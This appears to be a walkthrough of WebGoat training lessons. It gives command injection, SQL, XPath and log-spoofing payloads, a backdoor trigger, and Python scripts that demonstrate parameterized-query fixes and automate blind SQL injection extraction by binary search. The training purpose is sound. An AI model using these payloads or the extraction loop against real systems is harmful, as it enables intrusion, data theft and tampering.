1. Command Injection

HelpFile=AccessControlMatrix.help" %26 netstat -an %26 ipconfig"

(%26 is a URL-encoded &, so the shell runs netstat -an and ipconfig after the command that was meant to open the help file; the closing quote re-balances the original quoting.)

2. Numeric SQL Injection

101 oR 1=1

3. Log Spoofing

Smith%0d%0aLogin Succeeded for username: admin<script>alert(document.cookie)</script>

(%0d%0a is a URL-encoded CR LF; it ends the real log entry for "Smith" and starts a forged "Login Succeeded" line, which also carries a script payload for anyone viewing the log in a browser.)

4. XPATH Injection

import java.io.File;
import java.io.FileInputStream;
import javax.xml.xpath.*;
import org.w3c.dom.NodeList;
import org.xml.sax.InputSource;

// WebGoat's vulnerable lookup: username and password are concatenated straight into the XPath predicate
String dir = s.getContext().getRealPath("/lessons/XPATHInjection/EmployeesData.xml");
File d = new File(dir);
XPathFactory factory = XPathFactory.newInstance();
XPath xPath = factory.newXPath();
InputSource inputSource = new InputSource(new FileInputStream(d));
String expression = "/employees/employee[loginID/text()='" + username + "' and passwd/text()='" + password + "']";
nodes = (NodeList) xPath.evaluate(expression, inputSource, XPathConstants.NODESET);

This is what the server gets when the username is Smith' or 1=1 or 'a'='a:

expression = "/employees/employee[loginID/text()='Smith' or 1=1 or 'a'='a' and passwd/text()='password']"

And this is how the server interprets it, because and binds tighter than or in XPath, so the password check only applies to the last clause and 1=1 already matches every employee:

expression = "/employees/employee[ ( loginID/text()='Smith' or 1=1 ) OR ( 'a'='a' and passwd/text()='password' ) ]"

Mike' oR 1=1 oR 'a'='a and Smith' oR 'a'='a both fail.

5. LAB: SQL Injection

Stage 1: String SQL Injection
Capture the request and change the password value to ' or 'a'='a
Stage 2: Parameterized Query #1
Is this asking me to modify the code?
Stage 3: Numeric SQL Injection
Change the id value to 101 OR 1=1 ORDER BY salary desc
Stage 4: Parameterized Query #2
What is this task even asking?
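Stages 2 and 4 of the WebGoat lab are the developer-side half of the exercise: the same two queries with string concatenation replaced by a parameterized query. The following is an added example, not WebGoat's code, that runs all four stages against a constructed in-memory SQLite table (the employee rows are made up) so the effect of each payload from the lab is visible side by side with the fix:

```python
import sqlite3


def make_db():
    """Constructed stand-in for WebGoat's employee table (sample rows, not the lesson's data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE employee(userid INTEGER, first_name TEXT, last_name TEXT,
                              password TEXT, salary INTEGER);
        INSERT INTO employee VALUES (101, 'Larry',   'Stooge',      'larry',   55000);
        INSERT INTO employee VALUES (102, 'Moe',     'Stooge',      'moe',     60000);
        INSERT INTO employee VALUES (112, 'Neville', 'Bartholomew', 'neville', 450000);
    """)
    return conn


def login_vulnerable(conn, username, password):
    """Stage 1 shape: user input is spliced into the SQL text, so a quote in the
    password closes the literal and the remainder is parsed as SQL."""
    query = ("SELECT userid, first_name, salary FROM employee WHERE first_name = '"
             + username + "' AND password = '" + password + "'")
    return conn.execute(query).fetchall()


def login_parameterized(conn, username, password):
    """Stage 2 fix: placeholders. The values travel separately from the statement
    text, so ' or 'a'='a is compared as a literal password and matches nothing."""
    query = ("SELECT userid, first_name, salary FROM employee "
             "WHERE first_name = ? AND password = ?")
    return conn.execute(query, (username, password)).fetchall()


def view_profile_vulnerable(conn, employee_id):
    """Stage 3 shape: a numeric id concatenated without quotes, so no quote is
    needed; '101 OR 1=1 ORDER BY salary desc' lands straight in the WHERE clause."""
    query = ("SELECT userid, first_name, salary FROM employee WHERE userid = "
             + str(employee_id))
    return conn.execute(query).fetchall()


def view_profile_parameterized(conn, employee_id):
    """Stage 4 fix: coerce to int first (anything that is not a number raises
    ValueError), then bind the integer."""
    query = "SELECT userid, first_name, salary FROM employee WHERE userid = ?"
    return conn.execute(query, (int(employee_id),)).fetchall()


def run_lab(conn):
    """Runs the four stages with the page's payloads and returns a summary dict."""
    results = {}
    results["stage1_rows"] = len(login_vulnerable(conn, "Larry", "' or 'a'='a"))
    results["stage2_rows"] = len(login_parameterized(conn, "Larry", "' or 'a'='a"))
    rows = view_profile_vulnerable(conn, "101 OR 1=1 ORDER BY salary desc")
    results["stage3_rows"] = len(rows)
    results["stage3_top"] = rows[0][1]  # highest salary is listed first
    try:
        view_profile_parameterized(conn, "101 OR 1=1 ORDER BY salary desc")
        results["stage4_rejected"] = False
    except ValueError:
        results["stage4_rejected"] = True
    return results


if __name__ == "__main__":
    for key, value in run_lab(make_db()).items():
        print(key, value)
```

Stage 1 returns every employee (the OR makes the password check irrelevant), Stage 2 returns nothing for the same input, Stage 3 lists all employees with the best-paid one first, and Stage 4 refuses the input before it reaches the database.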

6. String SQL Injection

Smith' or 'a'='a

7. Modify Data with SQL Injection

jsmith';update salaries set salary=9999 where userid='jsmith

8. Add Data with SQL Injection

jsmith';insert into salaries(userid,salary) values('test123',99);--

9. Database Backdoors

101;update employee set salary=99000 where password='larry'

CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='john@hackme.com' WHERE userid = NEW.userid

Whenever a row is inserted, the trigger fires and the update statement runs, so every new employee's email is silently rewritten to the attacker's address.

10. Blind Numeric SQL Injection

101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') = 2364 );

11. Blind String SQL Injection

101 AND ((SELECT length(name) FROM pins WHERE cc_number='4321432143214321') = 4 );

The name value has length 4.

$ man ascii
# view the ASCII table

101 AND (substring((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) = 'J' );
101 AND (substring((SELECT name FROM pins WHERE cc_number='4321432143214321'), 2, 1) = 'i' );
101 AND (substring((SELECT name FROM pins WHERE cc_number='4321432143214321'), 3, 1) = 'l' );
101 AND (substring((SELECT name FROM pins WHERE cc_number='4321432143214321'), 4, 1) = 'l' );
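Guessing one value per request, as in lessons 10 and 11 above, is the idea; in practice the same true/false oracle is driven with a binary search so each request halves the remaining range (a 4-digit PIN falls in 14 requests instead of up to 10000). The following is an added example, not part of the original page or of WebGoat, that simulates the lesson's "Account number is valid" oracle over a constructed in-memory SQLite database (the pin 2364 and name Jill match the page's answers; the other rows are made up) and automates both the numeric and the string extraction. SQLite spells the page's substring() as substr() and exposes a character's code point as unicode(); both are assumptions about the backend, not something the page states.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the lesson's tables (sample rows, not WebGoat's data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE user_data(userid INTEGER, first_name TEXT, last_name TEXT);
        INSERT INTO user_data VALUES (101, 'Joe', 'Snow');
        CREATE TABLE pins(cc_number TEXT, pin INTEGER, name TEXT);
        INSERT INTO pins VALUES ('1111222233334444', 2364, 'Joesph');
        INSERT INTO pins VALUES ('4321432143214321', 1234, 'Jill');
    """)
    return conn


class Oracle:
    """Models the lesson page: the only thing the attacker learns per request is
    whether a row came back ('Account number is valid') or not."""

    def __init__(self, conn):
        self.conn = conn
        self.calls = 0  # number of requests sent, to compare strategies

    def valid(self, account_number):
        self.calls += 1
        # Same shape as the lesson: the account number is concatenated unquoted.
        query = "SELECT * FROM user_data WHERE userid = " + account_number
        return len(self.conn.execute(query).fetchall()) > 0


def extract_int(oracle, subquery, lo, hi):
    """Binary search on the value of a scalar subquery known to lie in [lo, hi].
    Each request answers 'is the value greater than mid?'."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle.valid(f"101 AND (({subquery}) > {mid})"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_string(oracle, subquery, max_len=64):
    """Recovers a text value: its length first, then each character's code point
    restricted to printable ASCII (32..126), one binary search per position."""
    length = extract_int(oracle, f"SELECT length(({subquery}))", 0, max_len)
    chars = []
    for i in range(1, length + 1):
        code = extract_int(
            oracle, f"SELECT unicode(substr(({subquery}), {i}, 1))", 32, 126)
        chars.append(chr(code))
    return "".join(chars)


def manual_pin_check(oracle, guess):
    """The page's single-guess payload from lesson 10, for comparison."""
    return oracle.valid(
        "101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') = "
        f"{guess} )")


if __name__ == "__main__":
    o = Oracle(make_db())
    pin = extract_int(o, "SELECT pin FROM pins WHERE cc_number='1111222233334444'", 0, 9999)
    name = extract_string(o, "SELECT name FROM pins WHERE cc_number='4321432143214321'")
    print("pin:", pin, "name:", name, "requests:", o.calls)
```

The comparison operator is the whole trick: `= 2364` confirms one guess, while `> mid` lets every answer discard half of what is left. The same loop works for any scalar the injected subquery can reach, which is why a blind injection is only "blind" in the sense of being slower.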